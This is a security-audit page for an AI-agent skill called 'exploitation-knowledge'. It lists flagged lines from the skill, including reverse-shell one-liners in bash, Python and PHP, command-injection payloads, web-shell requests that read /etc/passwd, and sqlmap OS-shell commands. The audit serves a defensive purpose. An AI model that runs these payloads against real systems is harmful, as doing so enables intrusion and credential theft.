exploitation-knowledge
Provides comprehensive methodologies for vulnerability exploitation, including exploit discovery, adaptation, and initial access techniques.
Install this skill
Security score
The exploitation-knowledge skill was audited on Feb 9, 2026 and we found 40 security issues across 4 threat categories, including 5 high-severity. Review the findings below before installing.
Categories Tested
Security Issues
Direct command execution function call
| 160 | python3 -c 'import pty;pty.spawn("/bin/bash")' |
Piping content to bash shell
| 299 | - Base64: echo BASE64 | base64 -d | bash |
System command execution
| 119 | <?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?> |
Python subprocess execution
| 116 | python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call |
Curl to non-GitHub URL
| 63 | curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url' |
Curl to non-GitHub URL
| 172 | curl -F "[email protected]" http://TARGET/upload.php |
Curl to non-GitHub URL
| 181 | curl http://TARGET/uploads/shell.php?cmd=id |
Curl to non-GitHub URL
| 201 | curl "http://TARGET/ping.php?ip=127.0.0.1;id" |
Curl to non-GitHub URL
| 202 | curl "http://TARGET/ping.php?ip=127.0.0.1|whoami" |
Curl to non-GitHub URL
| 203 | curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`" |
Curl to non-GitHub URL
| 206 | curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" |
Curl to non-GitHub URL
| 216 | curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url' |
Curl to non-GitHub URL
| 310 | curl "http://TARGET/shell.php?cmd=which nc" |
Curl to non-GitHub URL
| 314 | curl "http://TARGET/shell.php?cmd=which python3" |
Curl to non-GitHub URL
| 318 | curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'" |
Curl to non-GitHub URL
| 377 | curl http://TARGET/shell.php?cmd=cat+/etc/passwd |
Curl to non-GitHub URL
| 380 | curl http://TARGET/shell.php?cmd=cd+/home;ls+-la |
Curl to non-GitHub URL
| 383 | curl http://TARGET/shell.php?cmd=id;whoami;pwd |
Wget to non-GitHub URL
| 219 | wget https://raw.githubusercontent.com/user/repo/exploit.py |
Access to /etc/passwd
| 194 | sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd |
Access to /etc/passwd
| 276 | # Try: cat /etc/passwd |
Access to /etc/passwd
| 377 | curl http://TARGET/shell.php?cmd=cat+/etc/passwd |
External URL reference
| 63 | curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url' |
External URL reference
| 172 | curl -F "[email protected]" http://TARGET/upload.php |
External URL reference
| 178 | gobuster dir -u http://TARGET/uploads -x php,phtml |
External URL reference
| 181 | curl http://TARGET/uploads/shell.php?cmd=id |
External URL reference
| 188 | sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3 |
External URL reference
| 191 | sqlmap -u "http://TARGET/page.php?id=1" --os-shell |
External URL reference
| 194 | sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd |
External URL reference
| 201 | curl "http://TARGET/ping.php?ip=127.0.0.1;id" |
External URL reference
| 202 | curl "http://TARGET/ping.php?ip=127.0.0.1|whoami" |
External URL reference
| 203 | curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`" |
External URL reference
| 206 | curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" |
External URL reference
| 216 | curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url' |
External URL reference
| 310 | curl "http://TARGET/shell.php?cmd=which nc" |
External URL reference
| 314 | curl "http://TARGET/shell.php?cmd=which python3" |
External URL reference
| 318 | curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'" |
External URL reference
| 377 | curl http://TARGET/shell.php?cmd=cat+/etc/passwd |
External URL reference
| 380 | curl http://TARGET/shell.php?cmd=cd+/home;ls+-la |
External URL reference
| 383 | curl http://TARGET/shell.php?cmd=id;whoami;pwd |